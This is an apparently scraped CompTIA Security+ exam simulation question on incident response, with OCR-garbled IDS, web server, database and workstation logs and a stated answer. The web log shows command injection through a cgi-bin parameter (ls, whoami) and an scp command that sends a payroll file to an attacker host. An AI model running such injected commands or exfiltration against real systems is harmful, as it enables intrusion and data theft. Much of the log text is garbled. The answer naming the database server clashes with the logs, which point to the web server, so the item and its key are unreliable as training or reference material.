Question 243 of 730 from exam SY0-601: CompTIA Security+

Question 243 of 730 from exam SY0-601: CompTIA Security+

Prev Question Next Question

Question

SIMULATION - A security administrator discovers that an attack has been completed against a node on the corporate network.

All available logs were collected and stored.

You must review all network logs to discover the scope of the attack, check the box of the node(s) that have been compromised and drag and drop the appropriate actions to complete the incident response on the network.

The environment is a critical production environment; perform the LEAST disruptive actions on the network, while still performing the appropriate incid3nt responses.

Instructions: The web server, database server, IDS, and User PC are clickable.

Check the box of the node(s) that have been compromised and drag and drop the appropriate actions to complete the incident response on the network.

Not all actions may be used, and order is not important.

If at any time you would like to bring back the initial state of the simulation, please select the Reset button.

When you have completed the simulation, please select the Done button to submit.

Once the simulation is submitted, please select the Next button to continue.

Forensics Diagram Instructions: If at any time you would like to bring back the initial state of the simulation, please select the Reset button. When you have completed the simulation, please select the Done button to submit. ES Hacker Users PC 172:30.0.1 tal & Printer 9172.40.05 wee pptcaton (Database server Steer” O8ener feroio1 foro ors saab 10.12

Explanations

See the solution below.

Database server was attacked, actions should be to capture network traffic and Chain of Custody.

structions: tee off you woud tke frsirudtions: fat. ime you would like to bring back the initial state of the simulation, please select the to sul ut | Reset button. When you have completed the simulation, please tomer ORs
Possible Actions: Capture Network Traffic Chain Of Custody Format Hash Iniage Record Time Offset System Restore Actions Performe: (Capture Network Traffic Chain Of Custody

IDS Server Log:

IDS Packet Capture No. Time Source Destination Protocol Length Info Cisco_87:85:04 Spanning-tree-(for-bridges) 00 STP 60 —_Conf. Root = 32768/100/00:1c:0e:87 78:00 Cost=4 Port = 0x8004 2.006303 Cisco_87:85:04 Spanning-ree-(for-bridges) 00 STP 60 Conf. Root =32768/10000:1c.0e87:78.00 Cost=4 Port= 0x8004 4.009585 172311461232 17231.146.123.1 ICMP 118 Echo (ping) request id=0x0001, seq= 11256, t=255 6.014086 172311461231 172.31.146.123.2 Echo (ping) reply id=0x0001, seq= 1256, t=255, 7.91131 123.123.123.123 10.10.10.10 GET /egi-bininewcount?command=!s HTTPI1.1 8.00312 10.10.1010 123.123.123.123 HTTP/1.1 200 OK (textintmi) 7.91131 123.123.123.123 1010.10.10 GET /egi-bininewcount?command= whoami HTTP/1.1 8.00312 1010.10.10 123.123.123.123 HTTP/1.1 200 OK (textintmi) 9 10.1232 123.123.123.123 10.10.1010 GET /eg-bininewcount?command=s% 20 8 Ntatafirncaincn nell ve LIFTON 4 <i .

Web Server Log:

Saar erence reruns mem rte nay “"FAST-WebCrawler/2.1-pre2 (ashen@company net)" 123.123.123.123 - - [26/Apr/2010:00:22:49 -0400) "GET /pics/Sstar2000 gif HTTP/1.0" 200 4005 “ntip:/iwww.comptia.com/asctortt/" "Mozilla/4.05 (Macintosh; |; PPC)" fcrawler.company.com - - [26/Apr/2010:00:22:50 -0400} "GET /news/news.html HTTP/1.0" 200 16716 "" "FAST-WebCrawler/2.1-pre2 (ashen@company net)" 123.123.123.123 - - [26/Apr/2010:00:22:50 -0400] "GET /pics/Sstar.gif HTTP/1.0" 200 1031 “nttp:/www.comptia.com/asctortt/" "Mozilla/4.05 (Macintosh; |; PPC)" 123.123.123.123 - - [26/Apr/2010:00:22:51 -0400] "GET /pics/a2hlogo jpg HTTP/1.0" 200 4282 “nttp:/www.comptia.com/asctortt/" "Mozilla/4.05 (Macintosh; |; PPC)" 123.123.123.123 - - [26/Apr/2010:00:22:51 -0400) "GET /cgi-bin/newcount?command=null&jafsof3awidth=4&font= digital&noshow HTTP/1.0" 200 36 "http:/www.comptia.com/asctortf/" "Mozilia/4.05 (Macintosh; I; PPC)" ‘ppp931.on.company.com - - [26/Apr/2010:00:22:52 -0400] "GET /download/windows/asctab31.zip HTTP/1.0" 200 1540096 “nttp:/www..company.com/downloads/freeware/iwebdevelopment/15.htm!" "Mozilia/4.7 [en]C-SYMPA (Win95; U)" 123.123.123.123 - - [26/Apr/2010:00:22:53 -0400] "GET /cgi-bin/newcount?command=Is HTTP/1.0" 200 36 “nttp:/www.comptia.com/asctortt/" "Mozilla/4.05 (Macintosh; |; PPC)" 123.123.123.123 - - [26/Apr/2010:00:22'58 -0400] "GET /cgi-bin/newcount?command=whoami HTTP/1.0" 200 36 “nttp:/www.comptia.com/asctortt/" "Mozilla/4.05 (Macintosh; |; PPC)" 151.44.15.252 - - [26/Apr/2010:00:22:58 -0400] "GET /cgi-bin/forum/commentary.pl/noframes/read/209 HTTP/1.1" 200 6863 "htip://search.virgilio.it/search/cgi/search.cgi" "Mozilia/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.7.0)" [26// %20-I%20/datalfinance/payroll/ ~ 123.123.123.123 F/2010:00:22:58 -0400] "GET /cgi-bin/newcount?commar
5 Actions 151.44.15.252 - - [26/Apr/2010:00:22:58 -0400] "GET /cgi-bin/forum/commentary.plnoframes/read/209 HTTP/1.1"200 6863 "htip://search.virgilio.it/search/cgi/search.cgi" "Mozilia/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.7.0)" 123.123.123.123 - - [26/Apr/2010:00:22:58 -0400] "GET /cgi-bin/newcount?command=Is%20-1%20/data/finance/payroll/ *xls HTTP/1.0" 200 36 "http:/www.comptia.com/asctortt” "Mozilla/4.05 (Macintosh; |; PPC)" 123.123.123.123 - - [26/Apr/2010:00:23:00 -0400) "GET /cgi-bin/newcount?command=scp%20/data/finance/payroll/ GLNov2010xis%20ro0t@ 123.123.123.123: HTTP/1.0" 200 36 "httpyww.complia com/asctorti" "Mozila/4.05 (Macintosh; I; PPC)" 213,60.233.243 - - [25/May/2010:00:17:09 +1200] "GET /internet/index. html HTTP/1.1" 200 6792 “nttpywww company comWideo‘streaming/http himt" "Mozila/5.0 (X11; U; Linux i686; es-ES; 1v-1.6) Gecko/20040413 Debian/1.6-5" 151.44.15.252 - - [25/May/2010:00:17:21 +1200] "GET /js/master.js HTTP/1.1" 200 2263 "nttp://www.company.com/ cgi-bin/forum/commentary.plnoframes/read/209" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.7.0)" 151.44,15,252 -- [25/May/2010:00:17:21 +1200] "GET /ess/master.css HTTP/1.1" 200 6123 "http://www. company.com! ¢gi-bin/forum/commentary.pl/noframes/read/209" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.7.0)" 11.44.15.252 -- 25/May/2010:00:17-21 +1200] "GET /magesmnavigatior/home' git HTTP/.1" 200 2736 "np /waw.company com /cgi-binforum/commentary p/noframes/read/209" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.7.0)" 191.44.15.252-- [25/May/2010:00-17:21 +1200] "GET Idata‘zookeeperico-100 gif HTTPI1.1" 200 196 “http zwww.company.com/ egibin/forum/commentary.p/noframes/read/209" "Mazilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.7.0)" 181.44.15.252-- [26¥May/2010:00-17:22 +1200] "GET /adsense-alternate him! HTTP/1.1" 200 887 “nitp:/Aww. company.com cgibin/forum/commentary plinoframes/read/209" "Mazilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.7.0)" 151.44.15.252-- [25!May/2010.00:17:39 +1200] "GET Idata/zookeeper/status him! HTTP/'1.1" 200 4195 "http/ww.company.com/ ‘egibirvforuvcomm oi) ,

Database Server Log:

Database Server Log Audit Failure Audit Success Audit Success Audit Success Audit Success Audit Success Audit Failure Audit Success Audit Success 2012/4/16 11:33 2012/4/16 11:35 2012/4/16 11:35 2012/4/16 11:35 2012/4/16 11:35 2012/4/16 11:35 2012/4/16 11:35 2012/4/16 11:35 2012/4/16 11:35 Microsoft Windows security auditing, Microsoft Windows security auditing, Microsoft Windows security auditing, Microsoft Windows security auditing, Microsoft Windows security auditing, Microsoft Windows security auditing, Microsoft Windows security auditing, Microsoft Windows security auditing, Microsoft Windows security auditing, Logon ‘Special Logon Logon Logon Logon ‘Sensitive Privilege Use Sensitive Privilege Use Logon Special Logon

Users PC Log:

User PC Log WORKSTATION A IP ADDRESS: 172:30.0.10 NETMASK: 255.255.255.0 GATEWAY 172:30.0.1
Prev Question Next Question